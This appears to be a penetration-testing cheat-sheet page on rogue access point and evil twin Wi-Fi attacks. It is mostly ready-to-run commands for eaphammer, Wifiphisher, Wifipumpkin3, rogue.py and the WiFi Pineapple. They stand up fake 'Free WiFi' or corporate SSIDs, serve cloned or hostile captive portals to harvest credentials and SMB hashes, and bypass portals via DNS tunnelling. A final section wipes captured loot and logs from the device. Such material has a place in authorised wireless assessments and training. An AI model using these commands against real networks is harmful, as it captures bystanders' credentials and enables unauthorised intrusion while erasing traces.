black electronics

Rogue AP and Evil Twin

Rogue Access Point and Evil Twin Attacks

Rogue Access Point and Evil Twin Attacks

Rogue access points and evil twins impersonate a legitimate network to capture credentials, harvest hashes or gain a foothold, and are especially effective against open and guest networks. This section covers open-network attacks, MANA, Wifiphisher, Wifipumpkin3, Airgeddon and the WiFi Pineapple.

Open Network Attacks

Open and guest networks are frequently the easiest foothold. Consider the following approaches when assessing them.

  • MAC spoofing — investigate connected client MAC addresses and spoof one if the network restricts access by MAC.
  • Brute force — captive portals can sometimes be brute forced.
  • Client isolation — check whether clients are isolated before authenticating to the guest portal, and what else is reachable on the network.
  • Captive portal spoofing — clone the captive portal (or host your own) on a rogue AP to harvest credentials.
  • Hostile portal attack — instead of serving a captive portal, redirect users from HTTP to SMB to capture their hashes.
  • Tunnelling — many guest networks do not restrict or monitor DNS, so the captive portal can sometimes be bypassed by tunnelling traffic over DNS to a server you control.

MAC Spoofing

Terminal window
sudo macchanger -s wlan0

Rogue AP with MANA (Open Network)

Terminal window
sudo ./eaphammer --interface wlan0 \
--essid "Free WiFi" \
--channel 1 \
--cloaking full \
--mana \
--wpa-version 2 \
--mac-whitelist mac-whitelist.txt
# Hostile portal against an open network
sudo ./eaphammer --interface wlan0 --essid "Free WiFi" --channel 1 --auth open --hostile-portal

Wifiphisher

Terminal window
# Rogue AP performing evil twin and KARMA attacks
sudo wifiphisher -aI wlan0 -eI eth0
# -aI AP interface
# -eI extensions interface
# https://github.com/wifiphisher/wifiphisher

Wifipumpkin3

Terminal window
# https://github.com/P0cL4bs/wifipumpkin3
sudo apt install libssl-dev libffi-dev build-essential python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install
sudo pip install ping3
# Configure DNS for the rogue AP
sudo nano /etc/systemd/resolved.conf # DNS=8.8.8.8 and DNSStubListener=no
sudo ln -sf /run/systemd/resolve/resolv.conf /etc/resolv.conf

Rogue AP (Pass-Through to the Internet)

Terminal window
sudo airmon-ng check kill
sudo ip link set wlan0 up
sudo wifipumpkin3
wp3 > set interface wlan0
wp3 > set ssid "Free WiFi"
wp3 > set proxy noproxy
wp3 > ignore pydns_server
wp3 > start

Rogue AP with a Captive Portal

Terminal window
sudo airmon-ng check kill
sudo ip link set wlan0 up
sudo wifipumpkin3
wp3 > set interface wlan0
wp3 > set ssid "Free WiFi"
wp3 > set proxy captiveflask
wp3 > start

Airgeddon

Terminal window
cd ~/tools/airgeddon
sudo bash airgeddon.sh

Rogue.py (Legacy)

rogue.py predates the Eaphammer / Wifipumpkin3 workflows above and is retained as an older alternative for standing up rogue APs.

Terminal window
# WPA-Personal rogue AP (requires the known password)
sudo python ~/tools/rogue/rogue.py -i wlan0 -c 1 --auth wpa-personal --bssid AA:BB:CC:DD:EE:FF --essid 'CorpWiFi' --wpa 2 --internet --print-creds --wpa-passphrase '<passphrase>' --hostile-portal --hostile-mode responder
# WPA-Enterprise rogue AP
sudo python ~/tools/rogue/rogue.py -i wlan0 -c 1 --auth wpa-enterprise --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --wpa 2 --internet --print-creds

WiFi Pineapple

The Hak5 WiFi Pineapple is a dedicated hardware rogue-AP platform.

Setup and Connecting

Terminal window
# Connect the Pineapple to Kali
sudo ip link set eth1 down # or whichever ethX appears in ifconfig
sudo ip addr add 172.16.42.42/255.255.255.0 dev eth1
sudo ip link set eth1 up
# Open the UI in a browser
# http://172.16.42.1:1471/
# Default credentials: root:hak5pineapple
# Connect the Pineapple to the internet over Wi-Fi:
# 1. Settings -> Networking
# 2. Click 'scan' under Wireless Client Mode
# 3. Choose your Wi-Fi and connect with credentials

PineAP Suite (Open AP and Evil Portal)

Terminal window
# Open AP
# - Connect the Pineapple to the internet as above
# - Select the Open AP tab in PineAP Suite
# - Create an open SSID (e.g. "Free WiFi") and uncheck 'hidden'
# - Deselect 'Impersonate all networks' (this breaks the connection if using
# Wireless Client Mode for internet access)
# - In the Filtering tab select the Deny list (not the Allow list, unless you
# intend to allow specific clients)
# Evil Portal
# 1. With the Open AP set up as above
# 2. Go to Modules -> Evil Portal
# 3. Download and modify, or upload, an evil portal
# 4. Click Start, then Start Web Server, then Activate Portal
# 5. Connect to the SSID configured in Open AP to see the portal
# 6. Click 'view log' next to the portal to see captured credentials

The portal redirect can be edited in /pineapple/ui/modules/evilportal/assets/api/Portal.php, pointing the redirect() and onSuccess() handlers at the target organisation’s site (for example http://www.example.com).

Cleaning the Pineapple

Terminal window
cd /root
rm -rf elog enrollment.log log.db log.db-journal recon.db recon.db-journal
cd /root/handshakes && rm -rf *
cd /root/loot && rm -rf *
# Factory reset while keeping the current firmware version
firstboot -y && reboot
Useful LinksPentest PayloadsCheat Sheets